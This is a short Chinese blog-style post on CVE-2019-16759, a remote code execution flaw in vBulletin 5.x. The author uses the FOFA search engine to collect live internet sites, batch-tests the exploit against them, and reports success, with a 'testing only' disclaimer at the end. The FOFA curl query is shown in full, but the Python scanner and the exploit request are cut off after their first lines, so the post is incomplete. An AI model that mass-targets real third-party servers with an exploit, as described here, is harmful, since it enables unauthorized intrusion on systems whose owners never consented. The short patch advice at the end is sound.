0x00 前言
vBulletin 是一个强大,灵活并可完全根据自己的需要定制的商用论坛程序套件,在全球拥有数万用户且增长速度很快。
2019年9月23日,vBulletin v5(5.0.0-5.5.4)被爆出存在远程代码执行的漏洞利用代码,CVE编号:CVE-2019-16759。
0x01 漏洞利用
因为vBulletin为商用程序,而其用户群主要集中在欧美地区,这里直接使用fofa搜索线上环境测试一下。
搜索关键词app="vBulletin"
,得到一万多条结果
手动查看了一下大部分都是4.x版本,要不然就是漏洞不存在,这里直接批量获取批量测试一下。
1 | echo 'app="vBulletin"' | base64 - | xargs -I{} curl "https://fofa.so/api/v1/search/all?email=${FOFA_EMAIL}&key=${FOFA_KEY}&qbase64={}" |
将获取到的内容保存到vb.txt
然后进行批量检测
1 | import requests |
手动测试一下
1 | POST |
至此复现成功,本文所有内容仅供测试,勿作他用。
0x02 修复建议
官方已出修复补丁,尽快进行下载修复。